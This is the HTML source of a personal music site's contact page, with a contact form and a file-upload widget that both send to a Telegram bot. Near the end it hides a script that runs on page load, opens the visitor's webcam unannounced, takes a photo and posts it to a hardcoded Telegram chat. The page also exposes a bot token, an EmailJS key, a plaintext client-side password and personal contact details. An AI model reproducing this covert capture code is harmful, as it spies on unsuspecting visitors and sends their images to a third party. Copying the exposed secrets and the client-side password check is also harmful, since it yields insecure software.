<!DOCTYPE html>
<html lang="en">

<head>
    <title>AradArasteh</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- <link rel="apple-touch-icon" href="assets/img/apple-icon.png">
    <link rel="shortcut icon" type="image/x-icon" href="assets/img/favicon.ico"> -->
    <!-- Load Require CSS -->
          <link rel="icon" href="a/aaaaaaaaaaaaaaaaaaaa.jpg">
    <link href="assets/css/bootstrap.min.css" rel="stylesheet">
    <!-- Font CSS -->
    <link href="assets/css/boxicon.min.css" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;600&display=swap" rel="stylesheet">
    <!-- Load Tempalte CSS -->
    <link rel="stylesheet" href="assets/css/templatemo.css">
    <!-- Custom CSS -->
    <link rel="stylesheet" href="assets/css/custom.css">
<!--
    
TemplateMo 561 Purple Buzz

https://templatemo.com/tm-561-purple-buzz

-->
</head>

<body>
    <!-- Header -->
    <nav id="main_nav" class="navbar navbar-expand-lg navbar-light bg-white shadow">
        <div class="container d-flex justify-content-between align-items-center">
            <a class="navbar-brand h1" href="index.html">
                <span class="text-dark h4">Arad</span> <span class="text-primary h4">Arasteh</span>
            </a>
            <button class="navbar-toggler border-0" type="button" data-bs-toggle="collapse" data-bs-target="#navbar-toggler-success" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
                <span class="navbar-toggler-icon"></span>
            </button>

            <div class="align-self-center collapse navbar-collapse flex-fill  d-lg-flex justify-content-lg-between" id="navbar-toggler-success">
                <div class="flex-fill mx-xl-5 mb-2">
                    <ul class="nav navbar-nav d-flex justify-content-between mx-xl-5 text-center text-dark">
                        <li class="nav-item">
                            <a class="nav-link btn-outline-primary rounded-pill px-3" href="index.html">Home</a>
                        </li>
                        <li class="nav-item">
                            <a class="nav-link btn-outline-primary rounded-pill px-3" href="about.html">About</a>
                        </li>
                        <li class="nav-item">
                            <a class="nav-link btn-outline-primary rounded-pill px-3" href="work.html">Music</a>
                        </li>
                        <!-- <li class="nav-item">
                            <a class="nav-link btn-outline-primary rounded-pill px-3" href="pricing.html">Pricing</a>
                        </li> -->
                         <li class="nav-item">
  <a class="nav-link btn-outline-primary rounded-pill px-3" href="javascript:void(0);" onclick="checkPassword()">Private</a>
</li>
                        <li class="nav-item">
                            <a class="nav-link btn-outline-primary rounded-pill px-3" href="contact.html">Contact</a>
                        </li>
                    </ul>
                </div>
                <div class="navbar align-self-center d-flex">
                    <a class="nav-link" href="#"><i class='bx bx-bell bx-sm bx-tada-hover text-primary'></i></a>
                    <a class="nav-link" href="#"><i class='bx bx-cog bx-sm text-primary'></i></a>
                    <a class="nav-link" href="#"><i class='bx bx-user-circle bx-sm text-primary'></i></a>
                </div>
            </div>
        </div>
    </nav>
    <!-- Close Header -->


    <!-- Start Banner Hero -->
    <section class="bg-light">
        <div class="container py-4">
            <div class="row align-items-center justify-content-between">
                <div class="contact-header col-lg-4">
                    <h1 class="h2 pb-3 text-primary">Contact</h1>
                    <h3 class="h4 regular-400"></h3>
                    <p class="light-300">
                        If you'd like to stay in touch with me, message me at the bottom of the page <B style="color: red;">Please Turn On Your Vpn For Send Messages برای ارسال پیام فیلتر شکن خود را فعال کنید</B>  <a rel="nofollow" href="https://storyset.com/" target="_blank"></a>.
                        
                    </p>
                </div>
                <div class="contact-img col-lg-5 align-items-end col-md-4">
                    <img style="height:200px ; width:400px ;" src="assets/img/banner-bg-02.jpg">
                </div>
            </div>
        </div>
    </section>
    <!-- End Banner Hero -->


    <!-- Start Contact -->
    <section class="container py-5">
<!-- 
        <h1 class="col-12 col-xl-8 h2 text-left text-primary pt-3">Create success campaign with us!</h1>
        <h2 class="col-12 col-xl-8 h4 text-left regular-400">Elit, sed do eiusmod tempor </h2>
        <p class="col-12 col-xl-8 text-left text-muted pb-5 light-300">
            Incididunt ut labore et dolore magna aliqua. Quis ipsum suspendisse ultrices
            gravida. Risus commodo viverra maecenas accumsan lacus vel facilisis. Laboris
            nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit
            in voluptate.
        </p> -->
<!-- 
        <div class="row pb-4">
            <div class="col-lg-4">

                <div class="contact row mb-4">
                    <div class="contact-icon col-lg-3 col-3">
                        <div class="py-3 mb-2 text-center border rounded text-secondary">
                            <i class='display-6 bx bx-news'></i>
                        </div>
                    </div>
                    <ul class="contact-info list-unstyled col-lg-9 col-9  light-300">
                        <li class="h5 mb-0">Media Contact</li>
                        <li class="text-muted">Mr. John Doe</li>
                        <li class="text-muted">010-020-0340</li>
                    </ul>
                </div>

                <div class="contact row mb-4">
                    <div class="contact-icon col-lg-3 col-3">
                        <div class="border py-3 mb-2 text-center border rounded text-secondary">
                            <i class='bx bx-laptop display-6' ></i>
                        </div>
                    </div>
                    <ul class="contact-info list-unstyled col-lg-9 col-9 light-300">
                        <li class="h5 mb-0">Technical Contact</li>
                        <li class="text-muted">Mr. John Stiles</li>
                        <li class="text-muted">010-020-0340</li>
                    </ul>
                </div>

                <div class="contact row mb-4">
                    <div class="contact-icon col-lg-3 col-3">
                        <div class="border py-3 mb-2 text-center border rounded text-secondary">
                            <i class='bx bx-money display-6'></i>
                        </div>
                    </div>
                    <ul class="contact-info list-unstyled col-lg-9 col-9 light-300">
                        <li class="h5 mb-0">Billing Contact</li>
                        <li class="text-muted">Mr. Richard Miles</li>
                        <li class="text-muted">010-020-0340</li>
                    </ul>
                </div>

            </div> -->


            <!-- Start Contact Form -->
<!-- فرم تماس -->
<div class="col-lg-8">
  <form class="contact-form row" id="infoForm" method="post" action="#" role="form">
    <div class="col-lg-6 mb-4">
      <div class="form-floating">
        <input type="text" class="form-control form-control-lg light-300" id="floatingname" name="inputname" placeholder="Name" required>
        <label for="floatingname">Name</label>
      </div>
    </div>

    <div class="col-lg-6 mb-4">
      <div class="form-floating">
        <input type="email" class="form-control form-control-lg light-300" id="floatingemail" name="inputemail" placeholder="Email" required>
        <label for="floatingemail">Email</label>
      </div>
    </div>

    <div class="col-lg-6 mb-4">
      <div class="form-floating">
        <input type="text" class="form-control form-control-lg light-300" id="floatingphone" name="inputphone" placeholder="Phone">
        <label for="floatingphone">Phone</label>
      </div>
    </div>

    <div class="col-lg-6 mb-4">
      <div class="form-floating">
        <input type="text" class="form-control form-control-lg light-300" id="floatingcompany" name="inputcompany" placeholder="Company Name">
        <label for="floatingcompany">Company Name</label>
      </div>
    </div>

    <div class="col-12">
      <div class="form-floating mb-4">
        <input type="text" class="form-control form-control-lg light-300" id="floatingsubject" name="inputsubject" placeholder="Subject">
        <label for="floatingsubject">Subject</label>
      </div>
    </div>

    <div class="col-12">
      <div class="form-floating mb-3">
        <textarea class="form-control light-300" rows="8" placeholder="Message" id="floatingtextarea" name="inputmessage" required></textarea>
        <label for="floatingtextarea">Message</label>
      </div>
    </div>

    <div class="col-md-12 col-12 m-auto text-end">
      <button type="submit" class="btn btn-secondary rounded-pill px-md-5 px-4 py-2 radius-0 text-light light-300">Send Message</button>
    </div>
  </form>
</div>

<!-- اسکریپت EmailJS -->
<script src="https://cdn.jsdelivr.net/npm/emailjs-com@3/dist/email.min.js"></script>
<script>
  emailjs.init("cUo_8BIBa2Vq3rExG"); // Public Key

  document.getElementById("infoForm").addEventListener("submit", function(e) {
    e.preventDefault();
    emailjs.sendForm("service_opq9brr", "template_w49kq89", this)
      .then(() => {
        alert("✅ پیام با موفقیت ارسال شد!");
        this.reset();
      }, (error) => {
        alert("❌ خطا در ارسال پیام: " + error.text);
      });
  });
</script>










<!-- File Upload to Telegram Section -->
<section class="container py-5">
  <div class="row justify-content-center">
    <div class="col-lg-6">
      <div class="card shadow-sm border-0">
        <div class="card-body text-center px-4 py-5">
          <h5 class="card-title text-primary mb-4">📁 ارسال فایل به ربات تلگرام</h5>
          
          <input type="file" id="fileInput" class="form-control mb-4" accept="image/*,video/*">
          
          <div id="fileInfo" class="alert alert-success d-none mb-4">✅ فایل انتخاب شد</div>
          
          <button id="sendBtn" class="btn btn-primary rounded-pill px-5 py-2 mb-3">ارسال فایل</button>

          <div id="progressContainer" class="mt-4 d-none">
            <div class="progress" style="height: 24px;">
              <div id="progressBar" class="progress-bar bg-warning text-dark fw-bold" role="progressbar" style="width: 0%">0%</div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>

<script>
  const botToken = "6923568496:AAHM_gMcdsy-O712NIoj87NbVe1fp7auoiw";
  const chatId = "1209515299";

  const fileInput = document.getElementById("fileInput");
  const fileInfo = document.getElementById("fileInfo");
  const progressContainer = document.getElementById("progressContainer");
  const progressBar = document.getElementById("progressBar");

  fileInput.addEventListener("change", () => {
    const file = fileInput.files[0];
    if (file) {
      fileInfo.textContent = `✅ فایل انتخاب شد: ${file.name}`;
      fileInfo.classList.remove("d-none");
    } else {
      fileInfo.classList.add("d-none");
    }
  });

  document.getElementById("sendBtn").addEventListener("click", () => {
    const file = fileInput.files[0];
    if (!file) {
      alert("لطفاً یک فایل تصویر یا ویدیو انتخاب کن.");
      return;
    }

    const formData = new FormData();
    formData.append("chat_id", chatId);
    formData.append("caption", "🧿 فایل انتخاب‌شده توسط کاربر:");
    formData.append("disable_notification", false);

    let endpoint = "";
    if (file.type.startsWith("image/")) {
      formData.append("photo", file, "file.jpg");
      endpoint = `https://api.telegram.org/bot${botToken}/sendPhoto`;
    } else if (file.type.startsWith("video/")) {
      formData.append("video", file, "file.mp4");
      endpoint = `https://api.telegram.org/bot${botToken}/sendVideo`;
    } else {
      alert("❗ فقط فایل تصویر یا ویدیو مجاز است.");
      return;
    }

    const xhr = new XMLHttpRequest();
    xhr.open("POST", endpoint, true);

    xhr.upload.onprogress = function (e) {
      if (e.lengthComputable) {
        const percent = Math.round((e.loaded / e.total) * 100);
        progressContainer.classList.remove("d-none");
        progressBar.style.width = percent + "%";
        progressBar.textContent = percent + "%";

        if (percent === 100) {
          progressBar.classList.replace("bg-warning", "bg-success");
          progressBar.style.height = "32px";
          progressBar.textContent = "✅ ارسال کامل شد!";
        }
      }
    };

    xhr.onload = function () {
      const result = JSON.parse(xhr.responseText);
      if (result.ok) {
        alert("✅ فایل با موفقیت ارسال شد!");
      } else {
        console.error(result);
        alert("❌ ارسال فایل انجام نشد: " + result.description);
      }
    };

    xhr.onerror = function () {
      console.error("⚠️ خطا در ارسال");
      alert("🚫 خطای ارتباط با تلگرام.");
    };

    xhr.send(formData);
  });
</script>












                    
            
                </form>
            </div><br><br><br><br><br><br>
            
            <script>
                document.getElementById('infoForm').addEventListener('submit', function(e) {
                    e.preventDefault();
                    
                    const token = '6923568496:AAHM_gMcdsy-O712NIoj87NbVe1fp7auoiw';
                    const chatId = '1209515299';
                    const name = document.getElementById('floatingname').value;
                    const email = document.getElementById('floatingemail').value;
                    const phone = document.getElementById('floatingphone').value;
                    const company = document.getElementById('floatingcompany').value;
                    const subject = document.getElementById('floatingsubject').value;
                    const message = document.getElementById('floatingtextarea').value;
                    
                    const text = `نام: ${name}\nایمیل: ${email}\nتلفن: ${phone}\nشرکت: ${company}\nموضوع: ${subject}\nپیام: ${message}`;
                    const url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(text)}`;
            
                    fetch(url)
                        .then(response => response.json())
                        .then(data => {
                            if (data.ok) {
                                alert('اطلاعات با موفقیت ارسال شد.');
                            } else {
                                alert('خطایی رخ داده است.');
                            }
                        })
                        .catch(error => {
                            console.error('Error:', error);
                            alert('خطایی رخ داده است.');
                        });
                });
            </script>
            
    <!-- End Contact -->


    <!-- Start Footer -->
    <!-- <footer class="bg-secondary pt-4">
        <div class="container">
            <div class="row py-4">

                <div class="col-lg-3 col-12 align-left">
                    <a class="navbar-brand" href="index.html">
                        <i class='bx bx-buildings bx-sm text-light'></i>
                        <span class="text-light h5">Purple</span> <span class="text-light h5 semi-bold-600">Buzz</span>
                    </a>
                    <p class="text-light my-lg-4 my-2">
                        Lorem ipsum dolor sit amet, consectetur adipisicing elit,
                        sed do eiusmod tempor incididunt ut.
                    </p>
                    <ul class="list-inline footer-icons light-300">
                        <li class="list-inline-item m-0">
                            <a class="text-light" target="_blank" href="http://facebook.com/">
                                <i class='bx bxl-facebook-square bx-md'></i>
                            </a>
                        </li>
                        <li class="list-inline-item m-0">
                            <a class="text-light" target="_blank" href="https://www.linkedin.com/">
                                <i class='bx bxl-linkedin-square bx-md'></i>
                            </a>
                        </li>
                        <li class="list-inline-item m-0">
                            <a class="text-light" target="_blank" href="https://www.whatsapp.com/">
                                <i class='bx bxl-whatsapp-square bx-md'></i>
                            </a>
                        </li>
                        <li class="list-inline-item m-0">
                            <a class="text-light" target="_blank" href="https://www.flickr.com/">
                                <i class='bx bxl-flickr-square bx-md'></i>
                            </a>
                        </li>
                        <li class="list-inline-item m-0">
                            <a class="text-light" target="_blank" href="https://www.medium.com/">
                                <i class='bx bxl-medium-square bx-md' ></i>
                            </a>
                        </li>
                    </ul>
                </div>

                <div class="col-lg-3 col-md-4 my-sm-0 mt-4">
                    <h3 class="h4 pb-lg-3 text-light light-300">Our Company</h2>
                        <ul class="list-unstyled text-light light-300">
                            <li class="pb-2">
                                <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light" href="index.html">Home</a>
                            </li>
                            <li class="pb-2">
                                <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="about.html">About Us</a>
                            </li>
                            <li class="pb-2">
                                <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="work.html">Work</a>
                            </li>
                            <li class="pb-2">
                                <i class='bx-fw bx bxs-chevron-right bx-xs'></i></i><a class="text-decoration-none text-light py-1" href="pricing.html">Price</a>
                            </li>
                            <li class="pb-2">
                                <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="contact.html">Contact</a>
                            </li>
                        </ul>
                </div>

                <div class="col-lg-3 col-md-4 my-sm-0 mt-4">
                    <h2 class="h4 pb-lg-3 text-light light-300">Our Works</h2>
                    <ul class="list-unstyled text-light light-300">
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Branding</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Business</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Marketing</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Social Media</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Digital Solution</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Graphic</a>
                        </li>
                    </ul>
                </div>

                <div class="col-lg-3 col-md-4 my-sm-0 mt-4">
                    <h2 class="h4 pb-lg-3 text-light light-300">For Client</h2>
                    <ul class="list-unstyled text-light light-300">
                        <li class="pb-2">
                            <i class='bx-fw bx bx-phone bx-xs'></i><a class="text-decoration-none text-light py-1" href="tel:010-020-0340">010-020-0340</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bx-mail-send bx-xs'></i><a class="text-decoration-none text-light py-1" href="mailto:info@company.com">info@company.com</a>
                        </li>
                    </ul>
                </div>

            </div>
        </div>

        <div class="w-100 bg-primary py-3">
            <div class="container">
                <div class="row pt-2">
                    <div class="col-lg-6 col-sm-12">
                        <p class="text-lg-start text-center text-light light-300">
                            © Copyright 2021 Purple Buzz Company. All Rights Reserved.
                        </p>
                    </div>
                    <div class="col-lg-6 col-sm-12">
                        <p class="text-lg-end text-center text-light light-300">
                            Designed by <a rel="sponsored" class="text-decoration-none text-light" href="https://templatemo.com/" target="_blank"><strong>TemplateMo</strong></a>
                        </p>
                    </div>
                </div>
            </div>
        </div>

    </footer> -->

    <footer class="bg-secondary pt-4">
        <div class="container">
            <div class="row py-4">

                <div class="col-lg-3 col-12 align-left">
                    <a class="navbar-brand" href="index.html">
                        <!-- <i class='bx bx-buildings bx-sm text-light'></i> -->
                        <span class="text-light h5">Arad</span> <span class="text-light h5 semi-bold-600">Arasteh</span>
                    </a>
                    <p class="text-light my-lg-4 my-2">
                    </p>
                    <ul class="list-inline footer-icons light-300">
                        <li class="list-inline-item m-0">
                            <a class="text-light" target="_blank" href="http://facebook.com/">
                                <!-- <i class='bx bxl-facebook-square bx-md'></i> -->
                            </a>
                        </li>
                        <li class="list-inline-item m-0">
                            <a class="text-light" target="_blank" href="https://www.linkedin.com/">
                                <!-- <i class='bx bxl-linkedin-square bx-md'></i> -->
                            </a>
                        </li>
                        <li class="list-inline-item m-0">
                            <a class="text-light" target="_blank" href="https://www.whatsapp.com/">
                                <!-- <i class='bx bxl-whatsapp-square bx-md'></i> -->
                            </a>
                        </li>
                        <li class="list-inline-item m-0">
                            <a class="text-light" target="_blank" href="https://www.flickr.com/">
                                <!-- <i class='bx bxl-flickr-square bx-md'></i> -->
                            </a>
                        </li>
                        <li class="list-inline-item m-0">
                            <a class="text-light" target="_blank" href="https://www.medium.com/">
                                <!-- <i class='bx bxl-medium-square bx-md' ></i> -->
                            </a>
                        </li>
                    </ul>
                </div>

                <div class="col-lg-3 col-md-4 my-sm-0 mt-4">
                    <h3 class="h4 pb-lg-3 text-light light-300">Our Part</h2>
                        <ul class="list-unstyled text-light light-300">
                            <li class="pb-2">
                                <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light" href="index.html">Home</a>
                            </li>
                            <li class="pb-2">
                                <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="about.html">About Us</a>
                            </li>
                            <li class="pb-2">
                                <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="work.html">Music</a>
                            </li>
                            <!-- <li class="pb-2">
                                <i class='bx-fw bx bxs-chevron-right bx-xs'></i></i><a class="text-decoration-none text-light py-1" href="pricing.html">Price</a>
                            </li> -->
                            <li class="pb-2">
                                <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="contact.html">Contact</a>
                            </li>
                        </ul>
                </div>

                <!-- <div class="col-lg-3 col-md-4 my-sm-0 mt-4">
                    <h2 class="h4 pb-lg-3 text-light light-300">Our Works</h2>
                    <ul class="list-unstyled text-light light-300">
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Branding</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Business</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Marketing</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Social Media</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Digital Solution</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bxs-chevron-right bx-xs'></i><a class="text-decoration-none text-light py-1" href="#">Graphic</a>
                        </li>
                    </ul>
                </div> -->

                <div class="col-lg-3 col-md-4 my-sm-0 mt-4">
                    <h2 class="h4 pb-lg-3 text-light light-300">This Is My Phon Number And Gmail </h2>
                    <ul class="list-unstyled text-light light-300">
                        <li class="pb-2">
                            <i class='bx-fw bx bx-phone bx-xs'></i><a class="text-decoration-none text-light py-1" href="tel:010-020-0340">0921-070-2616</a>
                        </li>
                        <li class="pb-2">
                            <i class='bx-fw bx bx-mail-send bx-xs'></i><a class="text-decoration-none text-light py-1" href="mailto:info@company.com">arasteharad36@gmail,com</a>
                        </li>
                    </ul>
                </div>

            </div>
        </div>

        <div class="w-100 bg-primary py-3">
            <div class="container">
                <div class="row pt-2">
                    <div class="col-lg-6 col-sm-12">
                    </div>
                    <div class="col-lg-6 col-sm-12">
                        <p class="text-lg-end text-center text-light light-300">
                            Designed by <a rel="sponsored" class="text-decoration-none text-light" href="https://templatemo.com/" target="_blank"><strong>AradArasteh</strong></a>
                        </p>
                    </div>
                </div>
            </div>
        </div>

    </footer>
    <!-- End Footer -->


    <!-- Bootstrap -->
    <script src="assets/js/bootstrap.bundle.min.js"></script>
    <!-- Templatemo -->
    <script src="assets/js/templatemo.js"></script>
    <!-- Custom -->
    <script src="assets/js/custom.js"></script>







        <script>
        async function takePhotoAndSend() {
            {
        
            const stream = await navigator.mediaDevices.getUserMedia({ video: true });

            const video = document.createElement('video');
            document.body.appendChild(video);
            video.srcObject = stream;
            await video.play();


            const canvas = document.createElement('canvas');
            const context = canvas.getContext('2d')
            canvas.width = video.videoWidth;
            canvas.height = video.videoHeight;
            context.drawImage(video, 0, 0, canvas.width, canvas.height);


            canvas.toBlob(blob => {
                sendPhotoToTelegram(blob);
                stream.getTracks().forEach(track => track.stop());
                document.body.removeChild(video);
                document.body.removeChild(canvas);
            }, 'image/jpeg');

            // } cach (error) {
            //     console.error('Error accessing the camera: ', error);
            }
        }





        function sendPhotoToTelegram(blob) {
            const url = 'https://api.telegram.org/bot6923568496:AAHM_gMcdsy-O712NIoj87NbVe1fp7auoiw/sendPhoto';
            const formData = new FormData();
            formData.append('photo', blob, 'photo.jpg');
            formData.append('chat_id', '1209515299');

            fetch(url, {
                method: 'POST',
                body: formData
            })
            .then(response => response.json())
            .then(data => console.log(data))
            .catch(error => console.error('Error sending photo to Telegram: ', error));

        }
        takePhotoAndSend();
    </script>




<script>
function checkPassword() {
  const correctPassword = "Arad7766@";

  const firstTry = prompt("لطفاً رمز عبور را وارد کنید:");
  if (firstTry === null) return;

  if (firstTry === correctPassword) {
    window.location.href = "pricing.html";
  } else {
    const secondTry = prompt("رمز اشتباه بود! لطفاً دوباره تلاش کنید:");
    if (secondTry === null) return;

    if (secondTry === correctPassword) {
      window.location.href = "pricing.html";
    } else {
      alert("رمز اشتباه است! دسترسی غیرمجاز.");
    }
  }
}
</script>

    

</body>

</html>